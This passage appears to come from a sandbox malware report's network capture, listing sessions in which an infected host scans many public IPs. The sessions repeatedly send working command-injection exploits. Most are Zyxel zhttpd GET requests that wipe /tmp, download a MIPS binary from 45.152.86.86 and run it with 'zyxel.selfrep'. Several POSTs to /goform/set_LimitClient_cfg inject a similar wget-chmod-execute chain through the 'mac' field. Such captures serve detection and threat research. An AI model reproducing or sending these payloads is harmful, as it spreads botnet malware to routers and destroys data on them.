                                        Mar 31, 2024 09:22:30.697698116 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8427192.168.2.2344920142.51.92.204443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:30.697755098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8428192.168.2.2339332137.108.168.43443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:30.727035046 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8429192.168.2.235464014.23.246.182443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:30.727061987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8430192.168.2.2336598175.187.236.100443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:30.727117062 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8431192.168.2.2341704104.19.253.1848080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:31.525453091 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:31.620811939 CEST328INHTTP/1.1 400 Bad Request
                                        Server: cloudflare
                                        Date: Sun, 31 Mar 2024 07:22:31 GMT
                                        Content-Type: text/html
                                        Content-Length: 155
                                        Connection: close
                                        CF-RAY: -
                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8432192.168.2.2350152193.151.80.1938080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:31.618267059 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:32.742371082 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8433192.168.2.235015678.154.169.168443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:31.731746912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8434192.168.2.2352936195.67.36.29443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:31.731822014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8435192.168.2.2338712211.149.236.234443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:31.731846094 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8436192.168.2.2345654124.132.119.242443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:31.731908083 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8437192.168.2.2348914104.31.15.177443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:31.731954098 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8438192.168.2.235579674.24.191.230443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:31.732208014 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8439192.168.2.235169639.26.188.117443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:31.732239962 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8440192.168.2.233449688.199.146.428080
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.630525112 CEST191OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                        Cookie: user=admin
                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 32 2e 38 36 2e 38 36 2f 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 6d 70 73 6c 3b 20 2e 2f 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 0d 0a 0d 0a
                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;wget http://45.152.86.86/mpsl; chmod 777 mpsl; ./mpsl lblink.selfrep;
                                        Mar 31, 2024 09:22:32.834841967 CEST49INHTTP/1.1 404 Site or Page Not Found


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8441192.168.2.234535249.125.103.76443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737143040 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8442192.168.2.235967614.233.181.161443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737195015 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8443192.168.2.2341200175.147.204.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737271070 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8444192.168.2.2337886166.115.163.162443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737325907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8445192.168.2.234840469.31.69.174443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737391949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8446192.168.2.2352530162.47.97.238443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737438917 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8447192.168.2.2348772211.158.235.154443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737472057 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8448192.168.2.234189450.226.250.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737509012 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8449192.168.2.2359372203.87.136.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737574100 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8450192.168.2.2333488148.68.20.111443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737598896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8451192.168.2.235956448.24.157.235443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737637997 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8452192.168.2.2353368146.110.105.81443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737668037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8453192.168.2.235576298.38.126.80443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737710953 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8454192.168.2.2360084101.197.65.67443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.737741947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8455192.168.2.235576857.41.9.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.738275051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8456192.168.2.234902495.210.176.185443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:32.738332987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8457192.168.2.234823243.217.195.7443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:33.741589069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8458192.168.2.235075263.50.170.211443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:33.741640091 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8459192.168.2.233766674.174.142.94443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:33.741693974 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8460192.168.2.2339142114.70.122.44443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:33.741745949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8461192.168.2.2352628168.199.42.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:33.741955996 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8462192.168.2.2334306218.166.16.126443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755135059 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8463192.168.2.2355506102.111.34.156443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755191088 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8464192.168.2.233526819.202.128.229443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755249023 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8465192.168.2.2339724106.60.177.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755314112 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8466192.168.2.2359844203.200.228.120443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755359888 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8467192.168.2.2359034166.26.10.219443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755389929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8468192.168.2.2352896116.26.110.11443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755440950 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8469192.168.2.233384832.230.125.233443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755475044 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8470192.168.2.2338844111.202.134.175443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755527973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8471192.168.2.2357236152.240.74.214443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755579948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8472192.168.2.2335730189.0.114.180443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755651951 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8473192.168.2.2343480116.140.55.205443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755724907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8474192.168.2.23330362.69.15.10443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755786896 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8475192.168.2.2349940218.46.225.200443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755853891 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8476192.168.2.2354578104.64.251.119443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755904913 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8477192.168.2.2337008212.161.247.77443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.755965948 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8478192.168.2.233454294.58.152.164443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756017923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8479192.168.2.235226260.182.140.240443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756088972 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8480192.168.2.2353228199.33.183.244443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756124973 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8481192.168.2.2334284209.70.125.213443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756171942 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8482192.168.2.236009466.145.8.195443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756207943 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8483192.168.2.2345912169.82.44.129443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756256104 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8484192.168.2.234225267.187.173.22443
                                        TimestampBytes transferredDirectionData
                                        Mar 31, 2024 09:22:34.756321907 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        8485192.168.2.2341594180.151.236.252443
                                        TimestampBytes transferredDirectionData
